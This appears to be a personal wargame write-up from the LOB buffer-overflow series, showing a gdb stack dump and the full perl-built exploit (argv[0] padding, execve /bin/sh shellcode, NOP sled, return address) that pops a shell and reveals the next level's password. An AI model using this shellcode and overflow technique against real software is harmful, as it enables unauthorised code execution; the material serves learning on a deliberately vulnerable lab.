0xbffffb98: 0x6f2f2f2f    0x00696772

(gdb) 

0xbffffba0: 0x99580b6a 0x2f2f6852 0x2f686873 0x896e6962

0xbffffbb0: 0x895352e3 0x9080cde1 0x90909090 0x90909090

0xbffffbc0: 0x90909090 0x90909090 0x90909090 0xbffffbc0

0xbffffbd0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbe0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffbf0: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc00: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc10: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc20: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc30: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc40: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc50: 0x00000000 0x00000000 0x00000000 0x00000000

0xbffffc60: 0x00000000 0x00000000

(gdb) quit

[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orgi"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xa0\xfb\xff\xbf"'` //attack with the correct return address.

j

 X?Rh//shh/bin??S?訴€???????????????????????

bash$ exit

exit

[darkelf@localhost darkelf]$ .`perl -e 'print "/"x72, "orge"'` `perl -e 'print "\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\xcd\x80", "\x90"x21,"\xa0\xfb\xff\xbf"'`

j

 X?Rh//shh/bin??S?訴€???????????????????????

bash$ my-pass

euid = 507

Haha ♥

I quit social media saying I'd study for exams..

and here I am doing LOB!!!!!!!!! What is this!!!!!!!!

NOTES:

argv[0] = absolute path

./ works no matter how many / there are

. plus orgi = 5

77-5=72

Payload is the one from the previous level

But where does the shellcode get stored? It's not the buffer

